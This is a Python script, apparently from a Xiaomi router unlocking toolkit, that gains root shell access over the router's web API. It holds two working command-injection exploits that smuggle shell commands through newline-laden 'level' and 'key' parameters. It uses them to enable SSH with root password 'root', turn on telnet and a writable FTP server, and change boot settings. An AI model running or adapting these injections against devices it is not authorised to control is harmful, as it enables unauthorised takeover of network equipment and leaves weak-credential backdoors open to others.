-
Notifications
You must be signed in to change notification settings - Fork 125
/
Copy pathconnect6.py
140 lines (114 loc) · 4.06 KB
/
connect6.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import requests
import xmir_base
from gateway import *
gw = Gateway(timeout = 4, detect_ssh = False)
if gw.status < 1:
die(f"Xiaomi Mi Wi-Fi device not found (IP: {gw.ip_addr})")
print(f"device_name = {gw.device_name}")
print(f"rom_version = {gw.rom_version} {gw.rom_channel}")
print(f"mac address = {gw.mac_address}")
dn = gw.device_name
gw.ssh_port = 22
ret = gw.detect_ssh(verbose = 1, interactive = True)
if ret == 23:
if gw.use_ftp:
die("Telnet and FTP servers already running!")
print("Telnet server already running, but FTP server not respond")
elif ret > 0:
#die(0, "SSH server already installed and running")
pass
info = gw.get_init_info()
if not info or info["code"] != 0:
die('Cannot get init_info')
ccode = info["countrycode"]
print(f'Current CountryCode = {ccode}')
stok = gw.web_login()
def exploit_1(cmd = { }, api = 'misystem/arn_switch'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
params = { 'open': 1, 'mode': 1, 'level': "\n" + cmd + "\n" }
res = requests.get(gw.apiurl + api, params = params)
return res.text
def exploit_2(cmd = { }, api = 'xqsystem/start_binding'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
params = { 'uid': 1234, 'key': "1234'\n" + cmd + "\n'" }
res = requests.get(gw.apiurl + api, params = params)
return res.text
# get device orig system time
dst = gw.get_device_systime()
exec_cmd = None
exp_list = [ exploit_2, exploit_1 ]
for exp_func in exp_list:
res = exp_func("date -s 203301020304")
#if '"code":0' not in res:
# continue
time.sleep(1.2)
dxt = gw.get_device_systime()
if dxt['year'] == 2033 and dxt['month'] == 1 and dxt['day'] == 2:
if dxt['hour'] == 3 and dxt['min'] == 4:
exec_cmd = exp_func
break
time.sleep(1)
# restore orig system time
time.sleep(1)
gw.set_device_systime(dst)
if not exec_cmd:
die('Exploits arn_switch/start_binding not working!!!')
if exec_cmd == exploit_1:
print('Exploit "arn_switch" detected!')
if exec_cmd == exploit_2:
print('Exploit "start_binding" detected!')
exec_cmd(r"sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
exec_cmd(r"nvram set ssh_en=1 ; nvram set boot_wait=on ; nvram set bootdelay=3 ; nvram commit")
exec_cmd(r"echo -e 'root\nroot' > /tmp/psw.txt ; passwd root < /tmp/psw.txt")
exec_cmd(r"/etc/init.d/dropbear enable")
print('Run SSH server on port 22 ...')
exec_cmd(r"/etc/init.d/dropbear restart")
exec_cmd(r"logger -t XMiR ___completed___")
time.sleep(0.5)
gw.use_ssh = True
gw.passw = 'root'
ssh_en = gw.ping(verbose = 0, contimeout = 11) # RSA host key generate slowly!
if ssh_en:
print('#### SSH server are activated! ####')
else:
print(f"WARNING: SSH server not responding (IP: {gw.ip_addr})")
if not ssh_en:
print("")
print('Unlock TelNet server ...')
exec_cmd("bdata set telnet_en=1 ; bdata commit")
print('Run TelNet server on port 23 ...')
exec_cmd("/etc/init.d/telnet enable ; /etc/init.d/telnet restart")
time.sleep(0.5)
gw.use_ssh = False
telnet_en = gw.ping(verbose = 2)
if not telnet_en:
print(f"ERROR: TelNet server not responding (IP: {gw.ip_addr})")
sys.exit(1)
print("")
print('#### TelNet server are activated! ####')
#print("")
#print('Run FTP server on port 21 ...')
gw.run_cmd(r"rm -f /etc/inetd.conf")
gw.run_cmd(r"sed -i 's/\\tftpd\\t/\\tftpd -w\\t/g' /etc/init.d/inetd")
gw.run_cmd('/etc/init.d/inetd enable')
gw.run_cmd('/etc/init.d/inetd restart')
gw.use_ftp = True
ftp_en = gw.ping(verbose = 0)
if ftp_en:
print('#### FTP server are activated! ####')
else:
print(f"WARNING: FTP server not responding (IP: {gw.ip_addr})")
if ssh_en or telnet_en:
gw.run_cmd('nvram set uart_en=1; nvram set boot_wait=on; nvram commit')
gw.run_cmd('nvram set bootdelay=3; nvram set bootmenu_delay=5; nvram commit')